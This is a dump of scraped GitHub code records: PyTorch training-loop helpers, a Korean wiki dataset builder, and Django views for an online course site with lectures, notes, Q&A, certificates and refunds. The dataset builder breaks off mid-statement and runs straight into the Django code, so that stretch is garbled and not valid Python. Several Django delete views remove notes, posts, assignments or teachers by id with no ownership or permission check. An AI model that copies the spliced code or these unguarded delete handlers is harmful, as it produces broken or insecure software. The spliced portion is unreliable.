survival=False, bce_use=False, class_weights=None, train=True, fp16=False):\n    if survival==False:\n        if bce_use==True:\n            loss_fn=torch.nn.BCEWithLogitsLoss()\n        else:\n            if loss_fn is None:\n                loss_fn=torch.nn.CrossEntropyLoss(weight=class_weights \\\n                    if class_weights is not None else None)\n    else:\n        print(\"Survival Loss Not implemented here yet\")\n    if survival==True:\n        assert(target.shape[1]==2)\n        assert(bce_use==False)\n    if train==True:\n        output, loss = forward_by_fp16(model=model,\n                            data=data,\n                            target=target,\n                            loss_fn=loss_fn,\n                            survival=survival,\n                            fp16=fp16)\n        \n    else:\n        with torch.no_grad():\n            output, loss = forward_by_fp16(model=model,\n                                data=data,\n                                target=target,\n                                loss_fn=loss_fn,\n                                survival=survival,\n                                fp16=fp16)\n    return output, loss\n\n# %%\ndef on_backward(loss, optimizer, batch, batches, scheduler, fp16, scaler, backward_every=1):\n    if fp16==True:\n        assert(scaler is not None)\n    if fp16==False:\n        loss.backward()\n    else:\n        scaler.scale(loss).backward()\n    \n    if ((batch+1) % backward_every ==0) or (batch==(batches-1)):\n        if fp16==False:\n            optimizer.step()\n        else:\n            scaler.step(optimizer)\n            scaler.update()\n        if scheduler is not None:\n            scheduler.step()\n        optimizer.zero_grad()\n    return\n\n# %%\ndef prepare_data_label_for_forward(data, target, device, bce_use, survival=False):\n    if survival==True:\n        assert(target.shape[1]==2)\n    if bce_use==True:\n        target=target.to(torch.float)\n    else:\n        target=target.squeeze(-1)\n    data, target = data.to(device), target.to(device)\n    return data, target\n\n# %%\ndef compute_pred_from_output(output):\n    pred=torch.argmax(output, dim=1)\n    return pred\n\n# %%\ndef prepare_pred_label_for_metric(output, target, bce_use, survival=False):\n    if survival==True:\n        assert(target.shape[1]==2)\n        print(\"Prediction for survival not implemented here yet\")\n    else:\n        if bce_use==True:\n            target_for_metric=target.to(torch.long)\n            pred_for_metric=nn.Sigmoid()(output)\n        else:\n            target_for_metric=target\n            pred_for_metric=compute_pred_from_output(output)\n    return pred_for_metric, target_for_metric\n# %%\ndef on_one_epoch(epoch, data_loader, model, device, num_classes, bce_use, \n        learning_rate, optimizer, metric_used, \\\n        loss_fn=None,\n        class_weights=None, scheduler=None, \n        lr_adjuster_on_val=None, lr_div_factor=None, \\\n        survival=False, one_cycle_epochs=None, \\\n        metric_from_whole=True, \\\n        train=False, inference_on_holdout=False,\n        scaler=None, backward_every=1, fp16=False):\n    loss_list=[]\n    metric_list=[]\n    shape_log_list=[1,1] if bce_use==True else [1]\n    pred_list=torch.empty(shape_log_list)\n    target_list=torch.empty(shape_log_list)\n    # if bce_use==True:\n    target_list=target_list.to(torch.long)\n    if train==True:\n        model.train()\n        optimizer.zero_grad()\n    else:\n        model.eval()\n    if (one_cycle_epochs is not None) and ((epoch+1) % one_cycle_epochs==0) and (train==True):\n        scheduler=torch.optim.lr_scheduler.OneCycleLR(optimizer=optimizer,\n                        max_lr=learning_rate,\n                        steps_per_epoch=len(data_loader) if backward_every==1 else int((len(data_loader)-1)/backward_every),\n                        div_factor=lr_div_factor,\n                        epochs=one_cycle_epochs if backward_every==1 else (one_cycle_epochs+1)*backward_every*2,\n                        verbose=False\n                        )\n    for batch_idx, (data, target) in enumerate(data_loader):\n        data, target=prepare_data_label_for_forward(data=data,\n                            target=target,\n                            device=device,\n                            bce_use=bce_use,\n                            survival=survival)\n        output, loss=on_forward(model=model,\n                            data=data, \n                            target=target,\n                            loss_fn=loss_fn,\n                            survival=survival,\n                            bce_use=bce_use,\n                            class_weights=class_weights,\n                            
train=train,\n fp16=fp16)\n if train==True:\n on_backward(loss=loss,\n optimizer=optimizer, \n batch=batch_idx, \n batches=len(data_loader),\n scheduler=scheduler, \n fp16=fp16, \n scaler=scaler, \n backward_every=backward_every)\n loss_list.append(loss.cpu().item())\n pred, target_metric=prepare_pred_label_for_metric(output=output,\n target=target, \n bce_use=bce_use,\n survival=survival)\n if num_classes==len(target_metric.unique()):\n metric_list.append(metric_used(pred, target_metric).cpu().item())\n if metric_from_whole==True:\n pred_list=torch.cat((pred_list, pred.cpu()), dim=0)\n target_list=torch.cat((target_list, target_metric.cpu()), dim=0)\n if metric_from_whole==True:\n metric_epoch=100*metric_used(pred_list[1:], target_list[1:])\n else:\n metric_epoch=100*sum(metric_list)/len(metric_list)\n loss_epoch=sum(loss_list)/len(loss_list)\n if train==False and inference_on_holdout==False:\n if lr_adjuster_on_val is not None:\n lr_adjuster_on_val.step(metric_epoch)\n \n return model, optimizer, scheduler, lr_adjuster_on_val, \\\n loss_epoch, metric_epoch, pred_list[1:], target_list[1:]\n\n# %%\ndef save_progress(epoch, save_every, model, optimizer, path_performance, path_performance_and_model,\n train_loss_list, train_metric_list, val_loss_list, val_metric_list):\n if ((epoch+1) % save_every==0.) and ((path_performance is not None) or (path_performance_and_model is not None)):\n if path_performance is not None:\n torch.save(\n {\n 'train_loss': train_loss_list,\n 'train_metric': train_metric_list,\n 'val_loss': val_loss_list,\n 'val_metric': val_metric_list\n },\n path_performance)\n if path_performance_and_model is not None:\n torch.save(\n {\n 'train_loss': train_loss_list,\n 'train_metric': train_metric_list,\n 'val_loss': val_loss_list,\n 'val_metric': val_metric_list,\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n },\n path_performance_and_model)\n\n# %%\ndef fit(epochs,\n train_loader, valid_loader, test_loader,\n model, device, num_classes, bce_use, \n learning_rate, optimizer, metric_used, \\\n loss_fn=None,\n class_weights=None, scheduler=None,\n lr_adjuster_on_val=None, lr_div_factor=None, \\\n survival=None, one_cycle_epochs=None, \\\n metric_from_whole=True, \\\n backward_every=1, fp16=False,\n save_every=None,\n path_performance=None,\n path_performance_and_model=None):\n\n if fp16==True:\n scaler=torch.cuda.amp.GradScaler()\n else:\n scaler=None\n\n model.to(device)\n\n train_loss_list=[]\n train_metric_list=[]\n val_loss_list=[]\n val_metric_list=[]\n\n for epoch in range(epochs):\n\n model, optimizer, scheduler, lr_adjuster_on_val, \\\n loss_epoch, metric_epoch, _, _ =on_one_epoch(\n epoch, train_loader, model, device, num_classes, bce_use, \n learning_rate, optimizer, metric_used, \\\n class_weights=class_weights,\n loss_fn=loss_fn,\n scheduler=scheduler, lr_adjuster_on_val=lr_adjuster_on_val,\n lr_div_factor=lr_div_factor, \\\n survival=survival, one_cycle_epochs=one_cycle_epochs, \\\n metric_from_whole=metric_from_whole, \\\n train=True, inference_on_holdout=False,\n scaler=scaler, backward_every=backward_every, fp16=fp16)\n train_loss_list.append(loss_epoch)\n train_metric_list.append(metric_epoch)\n\n model, optimizer, scheduler, lr_adjuster_on_val, \\\n loss_epoch, metric_epoch, _, _=on_one_epoch(\n epoch, valid_loader, model, device, num_classes, bce_use, \n learning_rate, optimizer, metric_used, \\\n class_weights=class_weights,\n loss_fn=loss_fn,\n scheduler=scheduler, 
lr_adjuster_on_val=lr_adjuster_on_val,\n            lr_div_factor=lr_div_factor, \\\n            survival=survival, one_cycle_epochs=one_cycle_epochs, \\\n            metric_from_whole=metric_from_whole, \\\n            train=False, inference_on_holdout=False,\n            scaler=scaler, backward_every=backward_every, fp16=fp16)\n        val_loss_list.append(loss_epoch)\n        val_metric_list.append(metric_epoch)\n        \n        print(f\"Epoch {epoch+1}/{epochs}, AUC_train: {train_metric_list[-1]:.2f}, AUC_valid: {val_metric_list[-1]:.2f}\")\n        \n        if save_every is not None:\n            # SAVING\n            save_progress(epoch,\n                save_every,\n                model,\n                optimizer,\n                path_performance,\n                path_performance_and_model,\n                train_loss_list,\n                train_metric_list,\n                val_loss_list,\n                val_metric_list)\n\n    if test_loader is not None:\n        test_loss_list=[]\n        test_metric_list=[]\n        model, optimizer, scheduler, lr_adjuster_on_val, \\\n        loss_epoch, metric_epoch, pred_test_list, target_test_list=on_one_epoch(\n            epoch, test_loader, model, device, num_classes, bce_use, \n            learning_rate, optimizer, metric_used, \\\n            class_weights=class_weights,\n            loss_fn=loss_fn, \n            scheduler=scheduler, lr_adjuster_on_val=lr_adjuster_on_val, \n            lr_div_factor=lr_div_factor, \\\n            survival=survival, one_cycle_epochs=one_cycle_epochs, \\\n            metric_from_whole=metric_from_whole, \\\n            train=False, inference_on_holdout=True,\n            scaler=scaler, backward_every=backward_every, fp16=fp16)\n        test_loss_list.append(loss_epoch)\n        test_metric_list.append(metric_epoch)\n\n        print(f\"AUC_test: {test_metric_list[-1]:.2f}\")\n    return pred_test_list, target_test_list","repo_name":"pigknight/expresstrain","sub_path":"legacy/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":13308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"9357413337","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport os\nimport re\nimport kss\nimport json\nimport logging\nimport torch\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader, random_split\nfrom transformers import BertTokenizer\n\n\"\"\"\nCreate a dataset of documents up to max_len in length\n\"\"\"\ndef make_data_upto_maxlen( tokenizer, max_len, path=\"../data/namuwiki.txt\"):\n    split_data = path.split('.')\n    split_data[-2]+= f'-139,184'\n    return_file_path = '.'.join(split_data)\n    logging.info('file name:'+return_file_path)\n\n    return_file= open(return_file_path,'w',encoding='utf-8')\n    docs = []\n    doc = \"\"\n    doc_len = 0\n\n    num_lines = sum(1 for line in open(path, 'r',encoding='utf-8'))\n    logging.info('file line number: '+str(num_lines))\n    data_file = open(path, 'r')\n\n    for line in tqdm(data_file,\n                     desc='namuwiki data maker',\n                     total=num_lines):\n        line = line[:-1]\n        line_len = len(tokenizer.encode(line))\n        added_doc_len = doc_len +line_len\n        if line ==\"\":\n            return_file.write(doc + \"\\n\")\n            doc = \"\"\n            doc_len = 0\n        elif doc_len = max_len and doc_len
    Return to main page.\")\n\n curuser_id = request.user.id\n isWatched = Progress.objects.raw('''SELECT * FROM main_progress as MP \n WHERE MP.lecture_no_id = %s AND MP.s_username_id = %s;'''\n , [lecture.lecture_no, curuser_id])\n print(isWatched)\n\n cno = course.cno\n lectures = Lecture.objects.raw('''SELECT * FROM courses_lecture as CL WHERE CL.cno_id = %s;''', [cno])\n isFinished = 0\n if (len(isWatched) == 0):\n cursor.execute('''INSERT INTO main_progress(lecture_no_id ,s_username_id) VALUES (%s, %s); ''',\n [lecture.lecture_no, curuser_id])\n prog = Progress.objects.raw('''SELECT MP.prog_id FROM main_progress as MP\n WHERE MP.s_username_id = %s AND \n MP.lecture_no_id IN ( SELECT lecture_no\n FROM courses_lecture \n WHERE cno_id = %s );'''\n , [curuser_id, cno])\n\n prog = Progress.objects.raw('''SELECT MP.prog_id FROM main_progress as MP\n WHERE MP.s_username_id = %s AND \n MP.lecture_no_id IN ( SELECT lecture_no\n FROM courses_lecture \n WHERE cno_id = %s );'''\n , [curuser_id, cno])\n if (len(prog) == len(lectures) and not isContributor and course.is_complete == 1):\n cursor.execute('''SELECT user_id FROM main_finishes WHERE cno_id = %s and user_id = %s;''',\n [cno, curuser_id])\n if not cursor.fetchone():\n cursor.execute('''INSERT INTO main_finishes(comment,cno_id,user_id,score) VALUES (%s,%s, %s,%s);''',\n [\"\", cno, curuser_id, 0])\n isFinished = 1\n\n lecandprog = [None] * len(lectures)\n for i in range(0, len(lectures)):\n isWatched = Progress.objects.raw('''SELECT * FROM main_progress as MP \n WHERE MP.lecture_no_id = %s AND MP.s_username_id = %s;'''\n , [lectures[i].lecture_no, curuser_id])\n\n if (len(isWatched) > 0):\n lecandprog[i] = (lectures[i], \"Watched\")\n else:\n lecandprog[i] = (lectures[i], \"Unwatched\")\n\n cursor.execute('''SELECT COUNT(MP.prog_id) FROM main_progress as MP\n WHERE MP.s_username_id = %s AND \n MP.lecture_no_id IN ( SELECT lecture_no\n FROM courses_lecture \n WHERE cno_id = %s );'''\n , [curuser_id, cno])\n cnt_prog = cursor.fetchone()\n\n if cnt_prog:\n cnt_prog = cnt_prog[0]\n\n cursor.execute('''SELECT COUNT(lecture_no) FROM courses_lecture as CL WHERE CL.cno_id = %s;''', [cno])\n cnt_lec = cursor.fetchone()\n\n if cnt_lec:\n cnt_lec = cnt_lec[0]\n\n if cnt_lec is None or cnt_lec == 0:\n avg_prog = 0\n else:\n avg_prog = int((cnt_prog / cnt_lec) * 100)\n\n announcements = Announcement.objects.raw('''SELECT * FROM main_announcement as MA,auth_user as U \n WHERE MA.cno_id = %s and MA.i_user_id = U.id;''', [cno])\n # announcements = Announcement.objects.filter(cno_id=course.cno)\n\n notes = Takes_note.objects.raw('''SELECT * FROM main_takes_note as MTN \n WHERE MTN.lecture_no_id = %s AND MTN.s_username_id = %s;''',\n [lecture.lecture_no, curuser_id])\n newNote = NewNoteForm()\n lecturecnt = len(lectures)\n\n questions = Post.objects.raw('''SELECT postno\n FROM main_post\n WHERE postno NOT IN (SELECT answer_no_id AS postno FROM main_quest_answ ) \n AND lecture_no_id = %s; ''', [lecture.lecture_no])\n\n cursor.execute('''SELECT postno,post,date,username,username_id\n FROM main_post, auth_user\n WHERE postno NOT IN (SELECT answer_no_id AS postno FROM main_quest_answ ) \n AND lecture_no_id = %s AND username_id = id; ''', [lecture.lecture_no])\n questions = cursor.fetchall()\n qanda = [None] * len(questions)\n\n answers = [None] * len(questions)\n for i in range(0, len(questions)):\n answers[i] = Quest_answ.objects.raw('''SELECT *\n FROM main_quest_answ, main_post\n WHERE question_no_id = %s AND answer_no_id = postno;''',\n [questions[i][0]])\n 
cursor.execute( '''SELECT postno,post,date,username,username_id\n FROM main_quest_answ, main_post,auth_user\n WHERE question_no_id = %s AND answer_no_id = postno AND username_id = id;''',\n [questions[i][0]] )\n answers[i] = cursor.fetchall()\n qanda[i] = (questions[i], answers[i])\n\n assignments = Assignment.objects.raw('''SELECT *\n FROM main_assignment\n WHERE lecture_no_id = %s;''', [lecture.lecture_no])\n\n\n cursor.execute('''SELECT count(assignmentno) \n FROM main_assignment,courses_lecture\n WHERE cno_id = %s AND lecture_no = lecture_no_id;''', [cno])\n assignmentcnt = cursor.fetchone()[0]\n #assignmentcnt = len(assignments)\n\n\n\n\n lecturemat = LectureMaterial.objects.raw('''SELECT *\n FROM courses_lecturematerial\n WHERE lecture_no_id = %s;''', [lecture.lecture_no])\n\n cursor.execute( '''SELECT count(lecture_no_id)\n FROM courses_lecturematerial, courses_lecture\n WHERE cno_id = %s AND lecture_no = lecture_no_id;''', [cno] )\n \n lecturematcnt = cursor.fetchone()[0]\n\n cursor.execute('''SELECT U.username \n FROM main_contributor AS MC,auth_user AS U\n WHERE MC.cno_id = %s AND MC.user_id = U.id;''', [course.cno])\n\n contributor_list = cursor.fetchall()\n contributors = [None] * len(contributor_list)\n for i in range(0, len(contributors)):\n contributors[i] = contributor_list[i][0]\n\n cursor.execute('''SELECT U.username \n FROM main_teaches AS MT,auth_user AS U\n WHERE MT.lecture_no_id = %s AND MT.user_id = U.id;''', [lecture.lecture_no])\n\n teaches_list = cursor.fetchall()\n teaches = [None] * len(teaches_list)\n for i in range(0, len(teaches)):\n teaches[i] = teaches_list[i][0]\n\n form_lecmat_assignment = CreateAssignmentAndLectureMaterialForm()\n\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n form_teacher = AddTeacherForm()\n\n form_question = AskQuestion()\n\n add_announcement = AddAnnouncementForm()\n topic_list = Topic.objects.raw('select topicname from main_topic;')\n context = {\n 'curlecture': lecture,\n 'course': course,\n 'announcements': announcements,\n 'notes': notes,\n 'assignments': assignments,\n 'assignmentcnt': assignmentcnt,\n 'lecturemat': lecturemat,\n 'lecturematcnt': lecturematcnt,\n 'lecturecnt': lecturecnt,\n 'qanda': qanda,\n 'lecandprog': lecandprog,\n 'url': '/' + course_slug + '/' + lecture_slug,\n 'contributors': contributors,\n 'form_lecmat_assignment': form_lecmat_assignment,\n 'user_type': user_type,\n 'topic_list': topic_list,\n 'isFinished': isFinished,\n 'teaches': teaches,\n 'avg_prog': avg_prog,\n 'isContributor': isContributor and (course.is_complete == 0),\n 'owner_username': owner_username,\n 'warning_message': warning_message\n }\n cursor.close()\n\n return render(request, 'courses/lecture_detail.html', context)\n\n def post(self, request, course_slug, lecture_slug, *args, **kwargs):\n cursor = connection.cursor()\n\n form_lecmat = CreateAssignmentAndLectureMaterialForm(request.POST)\n\n cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n lecture_no_row = cursor.fetchone()\n cursor.close()\n if not lecture_no_row:\n warning_message = \"Error: There is no lecture with this name.\"\n return MainView.get(self, request, warning_message)\n\n lecture_no = lecture_no_row[0]\n cursor = connection.cursor()\n\n if form_lecmat.is_valid():\n pdf_url_assignment = form_lecmat.cleaned_data['pdf_url_assignment']\n pdf_url_lecmat = 
form_lecmat.cleaned_data['pdf_url_lecmat']\n print(\"Assignment URL: \", pdf_url_assignment)\n print(\"Lecmat URL: \", pdf_url_lecmat)\n\n if pdf_url_lecmat:\n cursor.execute('insert into courses_lecturematerial (material, lecture_no_id) values (%s, %s);',\n [pdf_url_lecmat, lecture_no])\n if pdf_url_assignment:\n cursor.execute('insert into main_assignment (assignment, lecture_no_id) values (%s, %s);',\n [pdf_url_assignment, lecture_no])\n\n form_teacher = AddTeacherForm(request.POST)\n if form_teacher.is_valid():\n t_username = form_teacher.cleaned_data['addteacher']\n print(\"t_username\", t_username)\n cursor.execute('SELECT id from auth_user,accounts_instructor where username = %s AND id = student_ptr_id',\n [t_username])\n t_id_list = cursor.fetchone()\n if not t_id_list:\n warning_message = \"There is no teacher with this username.\"\n return LectureView.get(self, request, course_slug, lecture_slug, warning_message)\n\n t_id = t_id_list[0]\n\n cursor.execute('''SELECT user_id from main_teaches WHERE lecture_no_id = %s and user_id = %s''',\n [lecture_no, t_id])\n if not cursor.fetchone():\n cursor.execute('INSERT INTO main_teaches(lecture_no_id,user_id) VALUES (%s,%s);', [lecture_no, t_id])\n\n form_note = NewNoteForm(request.POST)\n if form_note.is_valid():\n newnote = form_note.cleaned_data['note']\n cursor.execute('INSERT INTO main_takes_note(note,lecture_no_id, s_username_id ) VALUES(%s,%s,%s);',\n [newnote, lecture_no, request.user.id])\n\n form_question = AskQuestion(request.POST)\n if form_question.is_valid():\n question = form_question.cleaned_data['question']\n print(\"Question : \", question)\n cursor.execute(\n 'insert into main_post (post, date, lecture_no_id, username_id) values (%s, curdate(), %s, %s);',\n [question, lecture_no, request.user.id])\n\n course_queue = Course.objects.raw('''SELECT * FROM courses_course WHERE slug = %s;''', [course_slug])\n if len(course_queue) > 0:\n course = course_queue[0]\n\n add_announcement = AddAnnouncementForm(request.POST)\n if add_announcement.is_valid():\n newannouncement = add_announcement.cleaned_data['addannouncement']\n cursor.execute('''insert into main_announcement (ann_date, ann_text, cno_id,i_user_id)\n values (curdate(),%s, %s, %s);''',\n [newannouncement, course.cno, request.user.id])\n\n cursor.close()\n return HttpResponseRedirect(request.path)\n\n\nclass DeleteTeacherView(View):\n def post(self, request, course_slug, lecture_slug, t_username, *args, **kwarg):\n\n cursor = connection.cursor()\n\n cursor.execute('SELECT id FROM auth_user WHERE username = %s;', [t_username])\n t_id_list = cursor.fetchone()\n if (t_id_list == None):\n warning_message = \"Error: There is no teacher with this username\"\n return LectureView.get(self, request, course_slug, lecture_slug, warning_message)\n\n t_id = t_id_list[0];\n print(t_id)\n cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n lecture_no_row = cursor.fetchone()\n if not lecture_no_row:\n warning_message = \"Error: There is no lecture with this name.\"\n return MainView.get(self, request, warning_message)\n\n lecture_no = lecture_no_row[0]\n\n cursor.execute('DELETE FROM main_teaches WHERE user_id = %s and lecture_no_id = %s;', [t_id, lecture_no])\n cursor.close()\n warning_message = \"Success: Teacher successfully deleted\"\n return LectureView.get(self, request, course_slug, lecture_slug, warning_message)\n\n\nclass DeleteAssignmentView(View):\n def post(self, request, course_slug, lecture_slug, a_id, *args, **kwarg):\n 
cursor = connection.cursor()\n\n cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n lecture_no_row = cursor.fetchone()\n if not lecture_no_row:\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n lecture_no = lecture_no_row[0]\n\n cursor.execute('DELETE FROM main_assignment WHERE assignmentno = %s AND lecture_no_id = %s',\n [a_id, lecture_no])\n\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteLectureMaterialView(View):\n def post(self, request, course_slug, lecture_slug, lm_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n lecture_no_row = cursor.fetchone()\n if not lecture_no_row:\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n lecture_no = lecture_no_row[0]\n\n cursor.execute('DELETE FROM courses_lecturematerial WHERE materialno = %s AND lecture_no_id = %s',\n [lm_id, lecture_no])\n\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteAnnouncementView(View):\n def post(self, request, course_slug, lecture_slug, ann_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n if not cno_row: # no course with this course slug (i.e. URL)\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug) # return to main page\n cno = cno_row[0]\n\n cursor.execute('DELETE FROM main_announcement WHERE ann_id = %s AND cno_id = %s', [ann_id, cno])\n\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteNoteView(View):\n def post(self, request, course_slug, lecture_slug, note_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('DELETE FROM main_takes_note WHERE note_id = %s;', [note_id])\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteQuestionView(View):\n def post(self, request, course_slug, lecture_slug, q_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('DELETE FROM main_quest_answ WHERE question_no_id = %s;''', [q_id])\n\n cursor.execute('DELETE FROM main_post WHERE postno = %s;', [q_id])\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteAnswerView(View):\n def post(self, request, course_slug, lecture_slug, a_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('DELETE FROM main_quest_answ WHERE answer_no_id = %s;''', [a_id])\n\n cursor.execute('DELETE FROM main_post WHERE postno = %s;', [a_id])\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass CourseCertificateView(View):\n def get(self, request, course_slug, *args, **kwargs):\n if not request.user.id:\n return HttpResponseRedirect(\"/login\")\n\n cursor = connections['default'].cursor()\n\n course_queue = Course.objects.raw('''SELECT * FROM courses_course WHERE slug = %s;''', [course_slug])\n\n curuser_id = request.user.id\n print(curuser_id)\n\n cursor.execute('''SELECT username,first_name, last_name FROM auth_user WHERE id = %s''', [curuser_id])\n user = cursor.fetchone()\n username = user[0]\n first_name = user[1]\n last_name = user[2]\n print(\"certificate username:\", username, first_name, 
last_name)\n \"\"\"\n img = Image.new('RGB', (100, 30), color=(73, 109, 137))\n \n d = ImageDraw.Draw(img)\n d.text((10, 10), \"Hello World\", fill=(255, 255, 0))\n \n canvas = Canvas(\"certificate.pdf\")\n canvas.drawString(72, 72, \"Congratulations\")\n canvas.save()\n \"\"\"\n if len(course_queue) > 0:\n course = course_queue[0]\n else:\n # 404 error\n return HttpResponseRedirect('/')\n\n finish_list = Finishes.objects.raw(\n '''SELECT * FROM main_finishes as MF WHERE MF.cno_id = %s AND MF.user_id = %s;''',\n [course.cno, curuser_id])\n\n if (not finish_list):\n return HttpResponseRedirect(\"/\" + course_slug)\n\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n context = {\n 'courseurl': '/' + course_slug,\n 'curcourse': course,\n 'user': curuser_id,\n 'username': username,\n 'first_name': first_name,\n 'last_name': last_name,\n 'user_type': user_type,\n 'topic_list': topic_list,\n 'course_slug': course_slug,\n #'pdf': canvas\n }\n cursor.close()\n\n return render(request, 'certificate.html', context)\n\n\nclass CourseFinishView(View):\n def get(self, request, course_slug, *args, **kwargs):\n\n if not request.user.id:\n return HttpResponseRedirect(\"/login\")\n\n cursor = connections['default'].cursor()\n\n course_queue = Course.objects.raw('''SELECT * FROM courses_course WHERE slug = %s;''', [course_slug])\n\n curuser_id = request.user.id\n print(curuser_id)\n\n cursor.execute('''SELECT username FROM auth_user WHERE id = %s''', [curuser_id])\n username = cursor.fetchone()[0];\n\n if len(course_queue) > 0:\n course = course_queue[0]\n else:\n # 404 error\n return HttpResponse(\"No course as stated. 
Return to main page.\")\n\n finish_list = Finishes.objects.raw(\n '''SELECT * FROM main_finishes as MF WHERE MF.cno_id = %s AND MF.user_id = %s;''',\n [course.cno, curuser_id])\n\n if (not finish_list):\n return HttpResponseRedirect(\"/\" + course_slug)\n finish_list = Finishes.objects.raw(\n '''SELECT * FROM main_finishes as MF WHERE MF.cno_id = %s AND MF.user_id = %s;''',\n [course.cno, curuser_id])\n currate = finish_list[0].score\n curcomment = finish_list[0].comment\n\n comment = FinishCourseCommentForm()\n rate = FinishCourseRateForm()\n\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n context = {\n 'currate': currate,\n 'curcomment': curcomment,\n 'url': '/' + course_slug + '/finish',\n 'curcourse': course,\n 'user': curuser_id,\n 'username': username,\n 'user_type': user_type,\n 'topic_list': topic_list,\n 'form': rate,\n 'course_slug': course_slug,\n }\n cursor.close()\n return render(request, 'courses/coursefinish.html', context)\n\n def post(self, request, course_slug, *args, **kwargs):\n cursor = connection.cursor()\n\n # cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n course_queue = Course.objects.raw('''SELECT * FROM courses_course WHERE slug = %s;''', [course_slug])\n\n curuser_id = request.user.id\n print(curuser_id)\n\n if len(course_queue) > 0:\n course = course_queue[0]\n else:\n # 404 error\n print(\"error no course as the stated\");\n form_comment = FinishCourseCommentForm(request.POST)\n\n if form_comment.is_valid():\n comment = form_comment.cleaned_data['comment']\n print(\"Comment: \", comment)\n cursor.execute('UPDATE main_finishes SET comment = %s where cno_id = %s AND user_id = %s;',\n [comment, course.cno, curuser_id])\n\n form_rate = FinishCourseRateForm(request.POST)\n print(\"form_rate: \", form_rate)\n\n if form_rate.is_valid():\n rate_s = form_rate.cleaned_data.get(\"rate\")\n print(\"Rate: \", rate_s)\n if rate_s == 'one':\n rate = 1\n elif rate_s == 'two':\n rate = 2\n elif rate_s == 'three':\n rate = 3\n elif rate_s == 'four':\n rate = 4\n elif rate_s == 'five':\n rate = 5\n cursor.execute('UPDATE main_finishes SET score = %s where cno_id = %s AND user_id = %s;',\n [int(rate), course.cno, curuser_id])\n cursor.close()\n\n return HttpResponseRedirect(request.path)\n\n\nclass AddComplainView(View):\n template_name = \"main/complain.html\"\n course_slug = \"\"\n\n def get(self, request, course_slug):\n form = ComplainForm()\n self.course_slug = course_slug\n if request.user.is_authenticated: # we need to check enrollments as well\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n return render(request, self.template_name, {'form': form,\n 'user_type': user_type,\n 'topic_list': topic_list, })\n warning_message = \"You need to log in\"\n return LoginView.get(self, request, warning_message)\n\n def post(self, request, course_slug):\n cursor = connection.cursor()\n self.course_slug = course_slug\n course_q = Course.objects.raw('select * '\n 'from courses_course '\n 'where slug = %s;',\n [self.course_slug])\n course = course_q[0]\n course_cno = course.cno\n\n form = ComplainForm(request.POST)\n if 
form.is_valid():\n description = form.cleaned_data['description']\n cursor.execute('insert into main_complaint (creation_date, description, course_id, s_user_id) '\n 'values (curdate(), %s, %s, %s);',\n [description, course_cno, request.user.id])\n cursor.close()\n return render(request, \"trivial/success_message_after_submitting.html\",\n {'success_message': 'Your refund request has been sent to the administrators. '\n 'You will get an answer in approximately a week. Please be patient.',\n 'course_slug': course_slug})\n cursor.close()\n return HttpResponseRedirect('/')\n\n\nclass RefundRequestView(View):\n template_name = \"main/refund.html\"\n course_slug = \"\"\n\n def get(self, request, course_slug):\n form = ComplainForm()\n self.course_slug = course_slug\n if request.user.is_authenticated: # we need to check enrollments as well\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n return render(request, self.template_name, {'form': form,\n 'user_type': user_type,\n 'topic_list': topic_list, })\n return HttpResponseRedirect('/')\n\n def post(self, request, course_slug):\n cursor = connection.cursor()\n self.course_slug = course_slug\n course_q = Course.objects.raw('select * '\n 'from courses_course '\n 'where slug = %s;',\n [self.course_slug])\n course = course_q[0]\n course_cno = course.cno\n\n form = ComplainForm(request.POST)\n if form.is_valid():\n description = 